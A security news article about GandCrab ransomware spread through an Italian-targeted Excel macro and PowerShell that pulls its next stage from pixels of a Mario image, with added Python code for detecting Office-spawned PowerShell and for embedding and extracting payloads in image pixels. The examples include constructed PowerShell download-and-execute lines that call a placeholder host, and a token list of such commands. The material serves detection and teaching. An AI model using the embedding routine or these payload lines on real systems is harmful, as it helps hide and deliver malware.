Malicious actors use steganography and a Mario image to spread GandCrab and other malware
Security researchers have found that the criminals behind GandCrab are distributing the ransomware with the help of steganography. The campaign pairs heavily obfuscated Microsoft PowerShell commands with a picture of Mario, the well-known Super Mario character, in which the next stage of the attack is hidden by subtly altering the blue and green values of the image's pixels.
For those unfamiliar with the term, steganography is the practice of concealing data inside an innocuous-looking file, in this case an image. Criminals use it so that the hidden code passes antivirus scanning as an ordinary picture and is only extracted and executed once it has reached the victim's machine.
Matthew Rowen, a security researcher at Bromium, came across the campaign while investigating a spreadsheet that static analysis had flagged as containing a Trojan:
A few days ago, I was investigating a sample piece of malware where our static analysis flagged a spreadsheet as containing a Trojan but the behavioural trace showed very little happening.
GandCrab ransomware is one of the most prominent file-locking threats: it has run numerous distribution campaigns, teamed up with other malware, and used infection methods as sophisticated as exploit kits. This notorious infection has many variants and aggressively targets users all over the world. With its latest campaign, the GandCrab developers have shown once again that they keep looking for new ways in to maximize their profits.
Researchers found an Excel spreadsheet with an embedded macro that downloads the payload, but only if the target is in Italy
Looking more closely at the malicious spreadsheet, the researchers found that its macro checks the country code reported by Excel's locale settings and, if it is not Italy's (39), simply exits without dropping the payload or encrypting any files. The malicious spam emails that carry the spreadsheet are also written in Italian and pose as payment notices, which matches that targeting.
The spreadsheet is also built to trick the user: its contents only display properly after the victim clicks the "enable editing" button, and that click is what allows the macro to run and infect the machine with GandCrab. Bromium's researchers found that the macro launches the next stage through the Command Prompt and Windows PowerShell:
After modifying the spreadsheet, the malware detonates inside one of our containers. We see the usual macro-based launch of cmd.exe and PowerShell with obfuscated arguments.
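The launch chain Bromium describes (Excel macro, then cmd.exe, then PowerShell with obfuscated arguments) is exactly what an endpoint detection rule should key on, whatever the final payload turns out to be. The Python script below is an added illustration, not code from Bromium or from the campaign: it walks constructed Sysmon-style process-creation events (hypothetical paths and pids, a placeholder URL, no real telemetry), flags PowerShell whose ancestry includes an Office application, and decodes any -EncodedCommand argument to look for download-and-execute or pixel-reading strings.

```python
"""Flag PowerShell launched from an Office macro, the chain described above.

Added example: the events below are constructed Sysmon-style process-creation
records, not telemetry from the Bromium investigation.
"""
import base64
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Strings that betray a download-and-execute stage or pixel-based payload extraction.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                     "frombase64string", "system.drawing", "getpixel")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str       # full path of the new process
    cmdline: str     # its command line


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument: base64 over the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse of encode_command; tolerant of a truncated blob."""
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


def _encoded_arg(cmdline: str) -> Optional[str]:
    """Return the base64 blob after -e/-ec/-enc/-EncodedCommand, if present."""
    m = re.search(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline)
    return m.group(1) if m else None


def analyse(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (pid, reasons) for every PowerShell process worth a second look."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = ntpath.basename(e.image).lower()
        if name not in POWERSHELL:
            continue
        reasons = []
        # Walk up the parent chain; an Office ancestor means a macro started this.
        chain, cur = [name], e
        while cur.ppid in by_pid:
            cur = by_pid[cur.ppid]
            pname = ntpath.basename(cur.image).lower()
            chain.append(pname)
            if pname in OFFICE_APPS:
                reasons.append("launched from Office: " + " <- ".join(chain))
                break
        low = e.cmdline.lower()
        if re.search(r"-w(?:indowstyle)?\s+hidden", low):
            reasons.append("hidden window")
        if re.search(r"-e(?:p|xecutionpolicy)\s+bypass", low):
            reasons.append("execution policy bypass")
        blob = _encoded_arg(e.cmdline)
        if blob:
            hits = [t for t in SUSPICIOUS_TOKENS if t in decode_encoded_command(blob).lower()]
            reasons.append("encoded command" + (": " + ", ".join(hits) if hits else ""))
        if reasons:
            findings.append((e.pid, reasons))
    return findings


# Constructed sample: hypothetical second stage with a placeholder host.
STAGE2 = ("$b=New-Object System.Drawing.Bitmap([IO.MemoryStream]::new("
          "(New-Object Net.WebClient).DownloadData('http://example.invalid/mario.png')));"
          "$p=$b.GetPixel(0,0);IEX $s")
ENC = encode_command(STAGE2)
SAMPLE_EVENTS = [
    ProcEvent(4012, 1200, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"EXCEL.EXE" C:\Users\user\Downloads\fattura.xls'),
    ProcEvent(4100, 4012, r"C:\Windows\System32\cmd.exe",
              f"cmd /c powershell -w hidden -ep bypass -enc {ENC}"),
    ProcEvent(4120, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell -w hidden -ep bypass -enc {ENC}"),
    # A benign PowerShell run from the desktop, for contrast.
    ProcEvent(5000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(5010, 5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for pid, reasons in analyse(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Only the PowerShell started under EXCEL.EXE is reported; the -File run under explorer.exe is silent. The parent-chain walk matters because the macro goes through cmd.exe first, so a rule that only looks at PowerShell's direct parent misses it. On a real estate, feed it Sysmon Event ID 1 or the equivalent EDR process-creation stream.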
A Super Mario image is used to hide the Windows PowerShell commands
As for the Super Mario image itself, the crooks hide the PowerShell stage inside the picture: the blue and green values of certain pixels are subtly altered so that they carry the bytes of the payload. The changes are far too small to see, so the doctored image is visually indistinguishable from a legitimate one, and to a scanner it is just another picture. That is what lets the stage pass inspection and reach the victim.
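To make the pixel trick concrete, here is an added worked example in Python; it is not the campaign's script or Bromium's analysis. It assumes the layout used by the public Invoke-PSImage tool, which matches the blue-and-green description above: each payload byte stores its high nibble in the low 4 bits of the pixel's blue value and its low nibble in the low 4 bits of its green value, one byte per pixel. The cover image (a stand-in for the Mario artwork), the 4-byte length prefix, the payload string and the placeholder host are all my own constructions.

```python
"""Nibble steganography in the green and blue channels, as a worked example.

Added illustration, not the campaign's script or Bromium's analysis. It assumes
the layout used by the public Invoke-PSImage tool: each payload byte puts its
high nibble in the low 4 bits of B and its low nibble in the low 4 bits of G,
one byte per pixel. The length prefix and the cover image are my additions.
"""
import random
from typing import List, Optional, Tuple

Pixel = Tuple[int, int, int]  # (R, G, B), each 0..255


def make_cover(width: int, height: int, seed: int = 7) -> List[Pixel]:
    """Constructed stand-in for the Mario artwork: a deterministic noisy gradient."""
    rng = random.Random(seed)
    px: List[Pixel] = []
    for _y in range(height):
        for x in range(width):
            base = (x * 255) // max(width - 1, 1)
            px.append(tuple(min(255, max(0, base + rng.randint(-12, 12))) for _ in range(3)))
    return px


def embed(cover: List[Pixel], payload: bytes) -> List[Pixel]:
    """Overwrite the low nibbles of B and G; R and the high nibbles are untouched."""
    data = len(payload).to_bytes(4, "big") + payload   # length prefix (my addition)
    if len(data) > len(cover):
        raise ValueError("cover image too small for payload")
    stego = list(cover)
    for i, byte in enumerate(data):
        r, g, b = cover[i]
        stego[i] = (r, (g & 0xF0) | (byte & 0x0F), (b & 0xF0) | (byte >> 4))
    return stego


def extract(img: List[Pixel]) -> Optional[bytes]:
    """Reassemble bytes from the low nibbles; None if the length prefix is implausible."""
    raw = bytes(((b & 0x0F) << 4) | (g & 0x0F) for _r, g, b in img)
    if len(raw) < 4:
        return None
    n = int.from_bytes(raw[:4], "big")
    if n > len(raw) - 4:
        return None          # a clean image yields a random, oversized length
    return raw[4:4 + n]


def max_channel_delta(a: List[Pixel], b: List[Pixel]) -> int:
    """Largest per-channel change between two images of equal size."""
    return max(abs(x - y) for p, q in zip(a, b) for x, y in zip(p, q))


SCRIPT_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "new-object")


def looks_like_script(data: bytes) -> bool:
    """Cheap triage: mostly printable text that mentions common PowerShell cmdlets."""
    if not data:
        return False
    printable = sum(32 <= c < 127 or c in (9, 10, 13) for c in data) / len(data)
    text = data.decode("ascii", errors="replace").lower()
    return printable > 0.95 and any(m in text for m in SCRIPT_MARKERS)


def scan_image(img: List[Pixel]) -> bool:
    """Would a scanner that already knows this exact layout flag the image?"""
    data = extract(img)
    return data is not None and looks_like_script(data)


# Constructed payload with a placeholder host; not the campaign's real command.
PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"

if __name__ == "__main__":
    cover = make_cover(64, 48)
    stego = embed(cover, PAYLOAD)
    print("max per-channel change:", max_channel_delta(cover, stego))
    print("recovered:", extract(stego).decode())
    print("cover flagged:", scan_image(cover), "| stego flagged:", scan_image(stego))
```

The round trip recovers the payload while no channel of any pixel moves by more than 15 out of 255, which is why the doctored picture looks identical to the original. Note that scan_image only works because it knows the exact layout; a generic image scanner does not, and that is the point of the technique. In practice the detection signal is the PowerShell that fetches an image and reads its pixels through System.Drawing, not the image itself. Applying this to a real PNG needs a decoder such as Pillow to turn the file into pixel tuples.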
After these checks and preparations, the PowerShell stage contacts an external server and downloads the GandCrab v5.1 ransomware (other payloads can be served the same way). Once it runs, the victim's files are encrypted with a strong cipher and each affected file is given a random extension.
Victims are then shown a ransom note demanding a specific payment to restore their files. Do not pay: there is no guarantee the criminals will deliver a working decryptor, and there is a real chance of simply losing the money as well. Check instead whether security vendors have published a free decryptor for your GandCrab version, and restore from offline backups where you have them.